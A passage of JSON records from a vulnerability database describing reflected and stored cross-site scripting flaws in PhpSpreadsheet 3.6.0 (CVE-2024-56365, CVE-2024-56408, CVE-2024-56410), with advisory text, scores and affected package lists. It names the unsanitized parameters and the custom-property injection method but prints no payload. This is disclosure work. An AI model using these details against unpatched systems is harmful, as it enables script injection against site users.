v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/download.php` script, an attacker can perform a XSS-type attack\n**Impact**: execution of arbitrary JavaScript code in the browser\n**Vulnerable component**: the constructor of the `Downloader` class\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the `name` and `type` variables\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in the constructor of the `Downloader` class) in Phpspreadsheet.\n\nThe latest version (3.6.0) of the `phpoffice/phpspreadsheet` library was installed. The installation was carried out with the inclusion of examples.\n\n*Listing 1. Installing the `phpoffice/phpspreadsheet` library*\n```\n$ composer require phpoffice/phpspreadsheet --prefer-source\n```\n\nThe `./vendor/phpoffice/phpspreadsheet/samples/download.php` file processes the GET parameters `name` and `type`.\n\n![fig1](https://github.com/user-attachments/assets/78d5b3c7-e2ab-4487-98e2-a975f74a71c0)\n\n*Figure 1. The `./vendor/phpoffice/phpspreadsheet/samples/download.php` file accepts GET parameters.*\n\nConsider the constructor of the `Downloader` class, where GET parameters are passed. Error is displayed without sanitization using GET parameters transmitted from the user.\n\n![fig2](https://github.com/user-attachments/assets/00baf1f8-298c-4654-a3e4-b99cf8053eac)\n\n*Figure 2. Error is displayed without sanitization*\n\nWhen clicking on the following link, arbitrary JavaScript code will be executed.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56365","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56365"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4#diff-fbb0f53a5c68eeeffaa9ab35552c0b01740396f1a4045af5d2935ec2a62a7816","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:16:35Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4#diff-fbb0f53a5c68eeeffaa9ab35552c0b01740396f1a4045af5d2935ec2a62a7816"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56365","reference_id":"CVE-2024-56365","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56365"},{"reference_url":"https://github.com/advisories/GHSA-jmpx-686v-c3wx","reference_id":"GHSA-jmpx-686v-c3wx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jmpx-686v-c3wx"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jmpx-686v-c3wx","reference_id":"GHSA-jmpx-686v-c3wx","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:16:35Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jmpx-686v-c3wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56365","GHSA-jmpx-686v-c3wx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bwgw-r1g3-8fhn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56426?format=json","vulnerability_id":"VCID-dhfy-12tw-uuh2","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file\n# Unauthorized Reflected XSS in `Convert-Online.php` file\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` script, an attacker can perform a XSS-type attack \n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the quantity variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Convert-Online.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file, which leads to the possibility of a XSS attack.\n\n![fig4](https://github.com/user-attachments/assets/71a6ab8b-db65-4e7e-bb36-39f0bd0f7077)\n\n*Figure 4. The message with the quantity parameter is displayed without sanitization*\n\n\nThe following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.\n\n<img width=\"460\" alt=\"fig5\" src=\"https://github.com/user-attachments/assets/022323c9-ca1e-44ea-9380-37ed7848e971\" />\n\n*Figure 5. In the server's response , the quantity variable is displayed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56408","reference_id":"","reference_type":"","scores":[{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80734","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80749","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80729","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80732","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80736","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56408"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/a50ebfe118b3ae0ddaea1c48ac19dc38692f4abc","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/a50ebfe118b3ae0ddaea1c48ac19dc38692f4abc"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56408","reference_id":"CVE-2024-56408","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56408"},{"reference_url":"https://github.com/advisories/GHSA-x88g-h956-m5xg","reference_id":"GHSA-x88g-h956-m5xg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x88g-h956-m5xg"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-x88g-h956-m5xg","reference_id":"GHSA-x88g-h956-m5xg","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-x88g-h956-m5xg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56408","GHSA-x88g-h956-m5xg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dhfy-12tw-uuh2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56423?format=json","vulnerability_id":"VCID-ghv1-bdy8-hygk","summary":"PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability in custom properties\n# Cross-Site Scripting (XSS) vulnerability in custom properties\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: the HTML page is generated without clearing custom properties\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateMeta`\n**Exploitation conditions**: a user viewing a specially generated Excel file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability in custom properties in Phpspreadsheet.\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 9. Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can embed a payload in a file property that will result in the execution of arbitrary JavaScript code.\nThe Excel file is unpacked and a custom property in the file is inserted into the `docProps/custom.xml` file.\n\n![fig17](https://github.com/user-attachments/assets/65453b48-bca5-4f5c-a683-315a7bb1ab1f)\n\n*Figure 17. Embedding the payload*\n\nAfter making the changes, a new archive with the xlsx extension was created. At the moment of converting the xlsx file into an HTML representation, a property is obtained that participates in the formation of a string without sanitization.\n\n![fig18](https://github.com/user-attachments/assets/e0f63bfb-d9e1-4c9d-a2a9-8a0a20406cdc)\n\n*Figure 18. Getting a custom property*\n\nWhen calling the static `generateMeta` method, you can see that the key of the custom property is displayed without sanitization.\n\n![fig19](https://github.com/user-attachments/assets/8c74e264-af68-4f62-8ac7-437e65884e86)\n\n*Figure 19. Getting a custom property*\n\nAs a result, when viewing the excel file as the HTML representation, arbitrary JavaScript code will be executed.\n\n<img width=\"356\" alt=\"fig20\" src=\"https://github.com/user-attachments/assets/a6ed21e3-685c-415c-b2dc-453bc0652bef\" />\n\n*Figure 20. Executing arbitrary JavaScript code*\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56410","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56410"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:01:24Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56410","reference_id":"CVE-2024-56410","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56410"},{"reference_url":"https://github.com/advisories/GHSA-wv23-996v-q229","reference_id":"GHSA-wv23-996v-q229","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv23-996v-q229"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wv23-996v-q229","reference_id":"GHSA-wv23-996v-q229","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:01:24Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wv23-996v-q229"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"v